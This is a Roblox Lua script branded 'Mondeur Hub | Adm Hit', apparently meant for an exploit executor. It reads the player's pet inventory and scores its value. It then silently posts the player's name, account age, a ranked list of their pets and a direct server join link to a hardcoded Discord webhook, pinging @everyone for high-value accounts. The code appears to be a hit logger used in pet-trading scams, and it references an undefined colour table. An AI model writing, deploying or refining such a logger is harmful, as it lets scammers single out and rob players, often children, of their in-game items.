--// MONDEUR HUB | ADM HIT 🦊 (REAL INVENTORY VERSION)

local HttpService = game:GetService("HttpService")
local ClientData = require(game:GetService("ReplicatedStorage"):WaitForChild("ClientModules"):WaitForChild("Core"):WaitForChild("ClientData"))

-- =========================
-- 🔥 HARDCODED WEBHOOK
-- =========================
local WEBHOOK = "https://webhook.lewisakura.moe/api/webhooks/1408047737102012506/4VZHtB_G9RmikEuLs0-A6yP_0AXaYmb4_4Y3TyaG_0Wxem1-OvNBtPC9n71B4-SSzkUa"

-- 🎯 SMART THRESHOLD SYSTEM
local LOW_THRESHOLD = 300
local HIGH_THRESHOLD = 1500

-- =========================
-- 🌐 REQUEST DETECTION
-- =========================
local requestFunc = (syn and syn.request) or (http and http.request) or http_request or request

if not requestFunc then
    warn("❌ No request function")
    return
end

-- =========================
-- RARITY PRIORITY (LEGENDARY = 5, ULTRA=4, etc.)
-- =========================
local rarityPriority = {
    legendary = 5,
    ultra_rare = 4,
    rare = 3,
    uncommon = 2,
    common = 1
}

-- =========================
-- 🏷️ EMOJIS WITH PROPERTIES
-- =========================
local function getPetEmoji(name, properties)
    local e = ""
    if name:find("red fox") then e = "🧑‍🌾 " 
    elseif name:find("disco bee") then e = "🪩 "
    elseif name:find("queen bee") then e = "🐝 " 
    end

    -- MUTATION TAGS
    if properties.mega then e = e .. "🌈 " end
    if properties.neon then e = e .. "🟣 " end
    if properties.fly then e = e .. "🪽 " end
    if properties.ride then e = e .. "🏇 " end
    
    if e == "" then e = "🐾 " end
    return e
end

-- =========================
-- 📦 PROCESS PETS (FULL PROPERTIES)
-- =========================
local function process(pets)
    local map, total = {}, 0

    for unique_id, pet_data in pairs(pets or {}) do
        if pet_data and pet_data.id then
            local petId = tostring(pet_data.id)
            
            -- SKIP UNTRADEABLE
            if petId:find("starter") or petId:find("practice") or petId:find("jiggly jerboa") then
                continue
            end
            
            -- CLEAN NAME
            local cleanName = petId:gsub("_", " "):gsub("%d", ""):gsub("%s+", " ")
            local displayName = cleanName:sub(1,1):upper() .. cleanName:sub(2):gsub("^%s*(.-)%s*$", "%1")

            if not map[displayName] then
                map[displayName] = {
                    name = displayName,
                    count = 0,
                    rarity = (pet_data.rarity or "common"):lower(),
                    properties = {
                        neon = pet_data.neon or pet_data.properties and pet_data.properties.neon,
                        mega = pet_data.mega or pet_data.properties and pet_data.properties.mega,
                        fly = pet_data.flyable or pet_data.properties and pet_data.properties.flyable,
                        ride = pet_data.rideable or pet_data.properties and pet_data.properties.rideable
                    }
                }
            end

            map[displayName].count += 1
            total += 10 
        end
    end

    local list = {}
    for name, v in pairs(map) do 
        table.insert(list, v) 
    end
    
    -- SMART SORT: RARITY PRIORITY FIRST, THEN COUNT
    table.sort(list, function(a,b)
        local aPriority = rarityPriority[a.rarity] or 1
        local bPriority = rarityPriority[b.rarity] or 1
        if aPriority ~= bPriority then
            return aPriority > bPriority
        end
        return a.count > b.count
    end)

    return list, total
end

-- =========================
-- 📋 FORMAT (WITH EMOJIS)
-- =========================
local function format(list)
    local t = {}
    for i, p in ipairs(list) do
        if i > 12 then break end
        local emoji = getPetEmoji(p.name:lower(), p.properties)
        table.insert(t, emoji .. p.name .. " x" .. p.count)
    end
    return (#t > 0 and table.concat(t,"\n") or "No tradeable pets")
end

-- =========================
-- 📊 TIER
-- =========================
local function getTier(v)
    if v >= HIGH_THRESHOLD then return "🔴 HIGH" end
    if v >= LOW_THRESHOLD then return "🟡 MID" end
    return "🟢 LOW"
end

-- =========================
-- 🚀 RUN
-- =========================
local function Run(data)
    local list, total = process(data.pets)
    local best = list[1] and (list[1].name.." x"..list[1].count) or "None"
    local petList = format(list)
    local tier = getTier(total)

    local content = (tier == "🔴 HIGH") and "@everyone" or ""
    local color = rarityColors[list[1] and list[1].rarity or "common"] or 0x2F3136

    local embed = {
        title = "🦊 Mondeur Hub | Adm Hit",
        description = "```" ..
            "👤 Display Name : "..data.player.displayName.."\n"..
            "🆔 Username     : "..data.player.username.."\n"..
            "📅 Account Age  : "..data.player.accountAge.." days\n"..
            "📱 Executor     : "..data.player.executor.."\n"..
            "👥 Players      : "..data.player.players.."\n"..
            "💰 Total Value  : "..total.."\n"..
            "📊 Tier         : "..tier.."```",
        fields = {
            {name="🏆 Best Pet", value="```"..best.."```"},
            {name="🐶 Pets (Best → Worst)", value="```"..petList.."```"},
            {name="🌐 Join Server", value="[Click to Join]("..data.joinLink..")"}
        },
        color = color,
        footer = {text = "Mondeuronbotton"}
    }

    local success, response = pcall(function()
        return requestFunc({
            Url = WEBHOOK,
            Method = "POST",
            Headers = { ["Content-Type"] = "application/json" },
            Body = HttpService:JSONEncode({content = content, embeds = {embed}})
        })
    end)

    if success then
        print("✅ Webhook Sent!")
    else
        warn("❌ Error: " .. tostring(response))
    end
end

-- =========================
-- EXECUTE
-- =========================
local inventory = ClientData.get("inventory")
local pets = inventory and inventory.pets or {}

Run({
    player = {
        displayName = game.Players.LocalPlayer.DisplayName,
        username = game.Players.LocalPlayer.Name,
        accountAge = game.Players.LocalPlayer.AccountAge,
        executor = (identifyexecutor and identifyexecutor()) or "Unknown",
        players = #game.Players:GetPlayers().."/"..game.Players.MaxPlayers
    },
    joinLink = "https://www.roblox.com/games/start?placeId=" .. tostring(game.PlaceId) .. "&instanceId=" .. tostring(game.JobId),
    pets = pets
})
